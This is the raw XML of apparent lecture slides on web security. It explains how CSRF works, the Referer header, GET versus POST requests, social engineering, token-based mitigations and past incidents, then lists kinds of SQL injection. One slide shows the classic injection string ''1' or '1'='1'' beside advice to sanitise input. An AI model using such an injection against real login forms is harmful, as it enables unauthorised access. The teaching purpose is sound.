        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting’s “Little Brother”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4682BA0F-2023-44C4-AD91-57A04484FD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both executed with embedded JavaScript code within HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF with POST requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both use a false, malicious website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS in non-persistent attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both exploit the server’s “blind trust”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires authenticated session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2738245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516F-20A3-4842-B7E3-AA72449C1CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Successful CSRF Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1314A489-EFBF-4FCD-AE90-29005D9A709D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header checking/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form submission or URL input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must initiate state change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Correct input values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387418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F6E9-0525-431D-BB88-2AA871985AE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B8036E-B92E-4D78-89D5-5C50A261F104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name misspelling upon invention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP header attached to server requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Points back to the original webpage before redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduces privacy concerns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be reset before request is sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proper handling is to blank it out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be set to false website (spoofing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful for CSRF mitigation, not completely effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181722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06AD-396E-4A48-A615-A7345C09330D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7CE420-9387-42EE-8472-9C90059546EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B8B572-D292-4ED9-B74B-E8C589D5D876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easily exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executes via “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” field within HTML image tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not very common</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09469D7D-C6EF-461B-9D88-BEEFD365CCED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4F49200-7146-44EE-BC64-B444376867FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Harder to exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executes via hidden form and JavaScript code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common with CSRF attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15D7ACA9-E2EB-4A93-BCD5-1AF6386A7FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="495301" y="5461701"/>
            <a:ext cx="5524500" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{103E9F35-D43F-48BF-AB0D-A066EF908DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019801" y="1439860"/>
            <a:ext cx="5886736" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367940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0484-19D6-46C4-AF63-56C197665896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173C97F8-1217-4FA6-806C-DDA953C9687B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim executes the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker uses social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious link sent via email or IM typically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack can be paired with second CSRF attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sends malicious link to everyone in contact list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F20FB0A-8069-4E88-83E8-DE561D028727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7863513" y="1357803"/>
            <a:ext cx="3183898" cy="3183898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280928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2769-7EA5-422B-8F97-AD3F37EA87CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22B5CA6A-AFBC-4454-9260-1BA855D1FD09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only use POST for any state changing operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not 100% reliable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not 100% reliable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hidden, randomly generated token value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attached to session cookie and all form requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server checks form token for match with cookie token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These techniques combined are effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS vulnerability renders all CSRF mitigation obsolete</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368152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976-7E7E-43E4-92CC-2E0C83098D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notable CSRF Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81BB4FCA-D986-46AE-A2D2-CFCBFD643299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Netflix, 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add DVDs to queue, change shipping address, change login credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YouTube, 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many brands of routers, 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change DNS settings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429297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FF6F-8AFA-406C-8397-C740F2AE0E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="1419227"/>
            <a:ext cx="9906000" cy="669218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sub-Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38FDE435-4A11-4279-B9BD-DCB0FB59DFD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2865433" y="2517472"/>
            <a:ext cx="3227389" cy="669218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Classic SQLI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9788A554-40EE-45A8-94A9-732ADBD90BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6099180" y="2575082"/>
            <a:ext cx="4951411" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Blind or Inference SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AA580CE-504F-4E3F-B840-278B55529B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4531613" y="3338718"/>
            <a:ext cx="3135133" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Compound SQLI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33687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2208-0603-425C-948E-40733BF0D480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filtering Escape Characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF09E7A0-2385-4587-B8D7-F112FC506B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT * FROM users WHERE Username = ‘1’ or ‘1’=‘1’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93BBD3F2-A6FD-445B-972E-C66783FEFE73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have to sanitize user input before sending to Database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
